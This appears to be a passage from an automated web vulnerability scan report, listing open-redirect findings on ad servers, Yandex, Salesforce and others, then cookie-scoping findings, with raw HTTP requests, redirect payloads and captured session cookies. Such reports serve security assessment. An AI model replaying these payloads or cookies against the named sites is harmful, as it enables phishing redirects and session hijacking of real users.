       url = url.substr(0, url.indexOf('/'));
       var sub1 = url.substr(0, 2);
       var
...[SNIP]...
<td style=\'width:50%;\'><form onsubmit="f_reg(this); return false;" >';
       str+='...................... ................... ...... ......................, ...... ........ ................ .......... .................. .. ................ .......................';        
       s
...[SNIP]...
<br><input size=20 name="pass" type="password" value="" onClick=\'this.focus();\'>';
       str+='<br>
...[SNIP]...
<br><input size=20 name="pass2" type="password" value="" onClick=\'this.focus();\'>';
       str+= '<br>
...[SNIP]...
15. Open redirection  previous  next
There are 4 instances of this issue:

15.1. http://ad.trafficmp.com/a/bpix [r parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/bpix

Issue detail

The value of the r request parameter is used to perform an HTTP redirect. The payload http%3a//ad2d2ff34e6e662f0/a%3f was submitted in the r parameter. This caused a redirection to the following URL:

Request

GET /a/bpix?adv=652&id=1005&r=http%3a//ad2d2ff34e6e662f0/a%3f HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=719
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3; T_6t2z=eo7%3A85fc%3A1; rth=2-ljzkpb-eo7~85fc~1~1-dlx~6ot5~1~1-7p9~0~1~1-

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 25 Apr 2011 15:21:30 GMT
Location: http://ad2d2ff34e6e662f0/a?
Connection: close
Set-Cookie: T_6t2z=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_am99=eo7%3A87aj%3A1; Domain=trafficmp.com; Expires=Tue, 24-Apr-2012 15:21:30 GMT; Path=/
Set-Cookie: rth=2-ljzkpb-eo7~87aj~1~1-dlx~6ot5~1~1-7p9~0~1~1-; Domain=trafficmp.com; Expires=Tue, 24-Apr-2012 15:21:30 GMT; Path=/
Content-Length: 0

15.2. http://an.yandex.ru/count/Ijtkb0MgGE440000ZhGnMDi4XP4H3fK2cm5kGoi1CuYjHd42YQMmoXgO1vsOQXQSkwfZHm6MfVcfmfgb3ijKagP3JWEAexCl0QMTAIkHj6-WPWoFiJVw7GAViYYJd0QJL9bNYw9wcWH2Z90r3A2GQXYdZoEZ0QG2V0q0 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://an.yandex.ru
Path:   /count/Ijtkb0MgGE440000ZhGnMDi4XP4H3fK2cm5kGoi1CuYjHd42YQMmoXgO1vsOQXQSkwfZHm6MfVcfmfgb3ijKagP3JWEAexCl0QMTAIkHj6-WPWoFiJVw7GAViYYJd0QJL9bNYw9wcWH2Z90r3A2GQXYdZoEZ0QG2V0q0

Issue detail

The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .a7d7bab4fd77ae98a/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:

The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.

Request

GET /count/Ijtkb0MgGE440000ZhGnMDi4XP4H3fK2cm5kGoi1CuYjHd42YQMmoXgO1vsOQXQSkwfZHm6MfVcfmfgb3ijKagP3JWEAexCl0QMTAIkHj6-WPWoFiJVw7GAViYYJd0QJL9bNYw9wcWH2Z90r3A2GQXYdZoEZ0QG2V0q0?test-tag=17073164&.a7d7bab4fd77ae98a/=1 HTTP/1.1
Host: an.yandex.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204; yabs-uvf=0000000000000000

Response

HTTP/1.1 302 Found
Date: Mon, 25 Apr 2011 14:35:17 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:35:17 GMT
Expires: Mon, 25 Apr 2011 14:35:17 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Location: http://www.iveco-ptc.spb.ru?.a7d7bab4fd77ae98a/=1&_openstat=ZGlyZWN0LnlhbmRleC5ydTszMjIwNzI7NDQzMjM3O3lhbmRleC5ydTpndWFyYW50ZWU
Content-Length: 0

15.3. http://www.instantengage.com/operator_status.php [on parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.instantengage.com
Path:   /operator_status.php

Issue detail

The value of the on request parameter is used to perform an HTTP redirect. The payload http%3a//afcbf9e1c0f67f989/a%3fhttp%3a//www.instantengage.com/images_store/set6_1.gif was submitted in the on parameter. This caused a redirection to the following URL:

Request

GET /operator_status.php?acctid=1756&on=http%3a//afcbf9e1c0f67f989/a%3fhttp%3a//www.instantengage.com/images_store/set6_1.gif&off=http%3A%2F%2Fwww.instantengage.com%2Fimages_store%2Fset6_2.gif&unique=2011325105357 HTTP/1.1
Host: www.instantengage.com
Proxy-Connection: keep-alive
Referer: http://www.integritydefender.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 25 Apr 2011 15:46:09 GMT
Server: Apache/2.0.50 (Fedora)
X-Powered-By: PHP/4.3.8
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
location: http://afcbf9e1c0f67f989/a?http://www.instantengage.com/images_store/set6_1.gif
P3P: CP="OTI DSP COR PSAa OUR IND COM NAV STA"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

15.4. https://www.salesforce.com/servlet/servlet.WebToLead [retURL parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.salesforce.com
Path:   /servlet/servlet.WebToLead

Issue detail

The value of the retURL request parameter is used to perform a redirect using a META HTTP-EQUIV tag. The payload .ab600377127d8d709/ was submitted in the retURL parameter. This caused a redirection to the following URL:

The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.

Request

POST /servlet/servlet.WebToLead?encoding=UTF-8 HTTP/1.1
Host: www.salesforce.com
Connection: keep-alive
Referer: http://www.reputationchanger.com/
Cache-Control: max-age=0
Origin: http://www.reputationchanger.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1303485951|session#1303485890745-255084#1303487751|PC#1303485890745-255084.17#1304695494; webact=%7B%22l_vdays%22%3A-1%2C%22l_visit%22%3A0%2C%22session%22%3A1303485889743%2C%22l_search%22%3A%22%22%2C%22l_dtype%22%3A%22%22%2C%22l_page%22%3A%22SFDC%3Aus%3Aplatform%22%2C%22counter%22%3A0%2C%22pv%22%3A1%2C%22f_visit%22%3A1303485889743%2C%22version%22%3A%22w170.1%22%2C%22rescoped%22%3Atrue%2C%22db%22%3A%7B%22name%22%3A%22media%20visions%22%2C%22size%22%3A%22vsb%22%2C%22ind%22%3A%22software%20%26%20technology%3Ahigh%20tech%22%7D%2C%22bar-expanded%22%3Atrue%7D; s_pers=%20v44%3DExternal%2520Websites%7C3233921094723%3B%20v30%3DExternal%2520Websites%257Cburp%7C3233921094725%3B; s_vi=[CS]v1|26D8CEE5051D3246-60000107A001D614[CE]
Content-Length: 198

oid=00DC0000000Piy3&retURL=.ab600377127d8d709/&lead_source=Website&first_name=2&last_name=2&email=2&phone=2333333333&description=2&imageField.x=75&imageField.y=45

Response

HTTP/1.1 200 OK
Server: SFDC
Is-Processed: true
Content-Type: text/html
Date: Mon, 25 Apr 2011 16:06:48 GMT
Content-Length: 381

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<meta HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
<meta http-equiv="Refresh" content="0; URL=http://.ab600377127d8d709/">
</hea
...[SNIP]...
16. Cookie scoped to parent domain  previous  next
There are 114 instances of this issue:

16.1. http://sorry.google.com/sorry/Captcha  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://sorry.google.com
Path:   /sorry/Captcha

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sorry/Captcha?continue=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dmalware%2Bvirus&id=5949669040493980881&captcha=ditiesc&submit=Submit HTTP/1.1
Host: sorry.google.com
Proxy-Connection: keep-alive
Referer: http://sorry.google.com/sorry/?continue=http://www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dmalware%2Bvirus
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=G6tAQMMliMdgbUozp0g-12zJ4nIr9W3lVB7VLX4tvICbyeI1deRYnF0ETnjMaFRcDOw858z9ldTQARgCwUuLQTXPs03YWNQDMeYsf58qFzWq4-g9gJ1mhwHeRmKdbRzf; S=sorry=WbnEk7itoTuIPssOyKDfZA

Response

HTTP/1.1 200 OK
Set-Cookie: GDSESS=ID=5291787839c86cd1:EX=1303757535:S=ADSvE-dYLqGVZRU9goNPGWtIQhblZ_kcyw; path=/; domain=google.com; expires=Mon, 25-Apr-2011 18:52:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=malware+virus
Date: Mon, 25 Apr 2011 15:52:15 GMT
Content-Type: text/html; charset=UTF-8
Server: GCS/1.0
Content-Length: 494
X-XSS-Protection: 1; mode=block
Expires: Mon, 25 Apr 2011 15:52:15 GMT

<HTML><HEAD>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>Redirecting</TITLE>
<META HTTP-EQUIV="refresh" content="1; url=http://www.google.com/search?sourceid=chrome&amp;i
...[SNIP]...
16.2. http://www.elineaccessories.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.elineaccessories.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.elineaccessories.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:48:58 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Pragma: no-cache
Last-Modified: Thu, 04 Mar 2010 17:52:58 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: iv_live_session=25243c969cc6fbedbe2bdfe048d7307f0edd471d; domain=elineaccessories.com; path=/; expires=Mon, 25-Apr-2011 22:48:58 GMT; HttpOnly
Vary: Accept-Encoding
Content-Length: 7892

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<link rel="shortcut icon" href="favicon.ico" type="image/x-icon" />
<meta name="descri
...[SNIP]...
16.3. http://www.gartner.com/technology/contact/contact_gartner.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.gartner.com
Path:   /technology/contact/contact_gartner.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /technology/contact/contact_gartner.jsp HTTP/1.1
Host: www.gartner.com
Proxy-Connection: keep-alive
Referer: http://www.gartner.com/DisplayDocument?doc_cd=127481
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WebLogicSession=cSYnN1vJnb1Nx84rkvK9h3y2Z1JSqHc4Q7GnchMG2ZDySdxm2Pns!475228577; TS83f541=32d23d3d5a761af07eb8e7078f5d2a8c0621405c7f8621844db564c8; WT_FPC=id=173.193.214.243-1722167968.30147392:lv=1303733464197:ss=1303732853510

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: MKTSESSIONID=nMx8N1kBgpd2v7XKWLb9qTL1ySyvfknTRk77TT2XbtpNyfyvrwqk!-1168810344; domain=.gartner.com; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Content-type: text/html; charset=ISO-8859-1
Date: Mon, 25 Apr 2011 12:11:14 GMT
ETag: "pv99785f693982e6484f97f558a3076f92"
Cache-Control: no-cache="set-cookie"
X-PvInfo: [S10202.C10821.A151087.RA0.G24F28.U2C9A436D].[OT/html.OG/pages]
Vary: Accept-Encoding
Set-Cookie: TS83f541=32d23d3d5a761af07eb8e7078f5d2a8c0621405c7f8621844db564c8; Path=/
Content-Length: 16560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>


<head>


<!-- Changes to title and meta tags
...[SNIP]...
16.4. http://www.internetreputationmanagement.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.internetreputationmanagement.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.internetreputationmanagement.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:53:06 GMT
Server: Apache
Set-Cookie: SESS66f1c041454c024a385686a578c40a41=jdc0ug637ehtjrcdllsnmave75; expires=Wed, 18-May-2011 19:26:26 GMT; path=/; domain=.internetreputationmanagement.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 15:53:06 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27191

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
16.5. http://www.internetreputationmanagement.com/sites/all/themes/newtheme/images/bg-tab.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.internetreputationmanagement.com
Path:   /sites/all/themes/newtheme/images/bg-tab.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sites/all/themes/newtheme/images/bg-tab.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.internetreputationmanagement.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 15:53:49 GMT
Server: Apache
Set-Cookie: SESS66f1c041454c024a385686a578c40a41=nid2651v1v78l5k1j020guaaj4; expires=Wed, 18-May-2011 19:27:09 GMT; path=/; domain=.internetreputationmanagement.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 15:53:49 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18766

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
16.6. http://www.internetreputationmanagement.com/sites/all/themes/newtheme/js/Coolvetica_400.font.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.internetreputationmanagement.com
Path:   /sites/all/themes/newtheme/js/Coolvetica_400.font.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sites/all/themes/newtheme/js/Coolvetica_400.font.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.internetreputationmanagement.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 15:53:34 GMT
Server: Apache
Set-Cookie: SESS66f1c041454c024a385686a578c40a41=5ubacchis5c6mimmiun2vqaqu6; expires=Wed, 18-May-2011 19:26:54 GMT; path=/; domain=.internetreputationmanagement.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 15:53:34 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
16.7. http://www.trucklist.ru/cars/trucks  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.trucklist.ru
Path:   /cars/trucks

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:37:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=1b167314767bdffd9a5c5c390d79c0cc; path=/; domain=trucklist.ru
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: records_per_page=30; expires=Tue, 24-Apr-2012 14:22:59 GMT; path=/; domain=.trucklist.ru
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:23:12 GMT
Content-Length: 139769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru">
<head>
   <meta htt
...[SNIP]...
16.8. http://ad.afy11.net/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad?mode=7&publisher_dsp_id=5&external_user_id=xrd52zkwjuxh&custom_mon=0 HTTP/1.1
Host: ad.afy11.net
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a=dlTCn+fJdUa0LKLUTmKT9w; s=1,2*4dab79ba*fBMrAvrgzc*LGZun_NH9cMDXDoMMI8GiBUBHw==*; f=AgECAAAAAADQJJIL142rTdU9kgdm-bJN; c=AQEDAAAAAADd1IcE942rTQAAAAAAAAAAAAAAAAAAAADXjatNAQABAAVhFtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD-OLnU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHTSCgFcjqtNAAAAAAAAAAAAAAAAAAAAADuOq00BAAEABWEW1egAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP84udToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAoOsmAWj9sk0AAAAAAAAAAAAAAAAAAAAAZv2yTQEAAQD5JiDV6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyyS71OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache, must-revalidate
Server: AdifyServer
Content-Type: image/gif
Content-Length: 45
Set-Cookie: s=1,2*4dab79ba*fBMrAvrgzc*LGZun_NH9cMDXDoMMI8GiBUBHw==*,5*4db58744*bwSz6lRck8*TLWvV9Mp1Su71GX8*ACWaeyU=; path=/; expires=Sat, 31-Dec-2019 00:00:00 GMT; domain=afy11.net;
P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"

GIF89a.............!.......,...........D..;if
16.9. http://ad.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/?t=i&f=j&p=5112&pl=bad56300&rnd=97383008780889220&clkurl=http://ib.adnxs.com/click/AAAAAAAAFEAAAAAAAAAUQAAAAMDMzABA4XoUrkfhFEDhehSuR-EUQICU8FEmC1Z8SsYda6b2ziU-g7VNAAAAAIAeAQC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gA3CRQE4ggBAgUCAAMAAAAAkxzWVwAAAAA./cnd=!wA_Htwjc8wIQx8kKGAAg0ccBKJQIMQAAALxH4RRAQgoIABAAGAAgASgBQgsIn0YQABgAIAMoAUILCJ9GEAAYACACKAFIAVAAWLcSYABolgU./referrer=http%3A%2F%2Fwww.livejournal.com%2F/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBJSjBPoO1TZvTCJDvlQfqvNzyB9fq-NMBl6GU7BiXn6ezIQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00NDU2MTgyMTM1OTU2OTc0oAHD8v3sA7IBE3d3dy5saXZlam91cm5hbC5jb226AQozMDB4MjUwX2FzyAEJ2gEbaHR0cDovL3d3dy5saXZlam91cm5hbC5jb20vmAKIJ8ACBMgChdLPCuACAOoCGjU2NTUvbGouaG9tZXBhZ2UvbG9nZ2Vkb3V0qAMB6AP4A_UDCACAhOAEAYAG6cSF9MWQ1oky%26num%3D1%26sig%3DAGiWqtxmq8nW3CGfJ8RQnem9Ve-Gn6Ps_g%26client%3Dca-pub-4456182135956974%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUDl0S8xnL7FEJVbNsodwmXFAeDNADA3gBY2BgEGFg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo34vh0s_LrmO7JhTOOWS3K7jlIvwuoZTzm9CCE451wYOqFwb0J3fge50gbmzQ8L9Nk59EnbauPS1n9y5CZe.9pMzanHKnRBejFPu2IJHOOWOfhXEKTdjATtuOdtWnHLTH3rilutYiVvOVBen3LSbijjlKst8geHOiFu.Wwgoz.C7ZWcDAwcwIe1kZGRkYAi8xcgMpBgMmBiEQXwFM7Dw0gKwMEsmIxtQkCWEiY2RHciQ38XEwA1SBk2DIAMZADWIkL4-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUxOdW3WQldyr.xNlqt1dY_m2yKF0DA3gBY2BgEGFg6lzCwJLdysDI.4OB4YYrAwMDJwMDo34vxzZvqFwLUO4nUM4NIefSj0uuIzvmFE65JLfrOOUivK7hlPObEIJTzrWBAyrXBnTnd6A7XWDu7JBwv41Tn4SdNi597Sd3bsKlr_3kjFqccieEF.OUO7bgEU65o18FccrNWMCOW862Fafc9IeeuOU6VuKWM9XFKTftpiIwbBlxyld2CwHlGXy37Gxg4AAmpJ2MjIwMDIG3GJmBFIMBE4MIiK9gBhZeWgAWZslkZAMKsoQwsTGyAxnyu5gYuEHKwGnQB2QeAwMAUdqQwA--; Domain=.amgdgt.com; Expires=Wed, 25-May-2011 14:20:49 GMT; Path=/
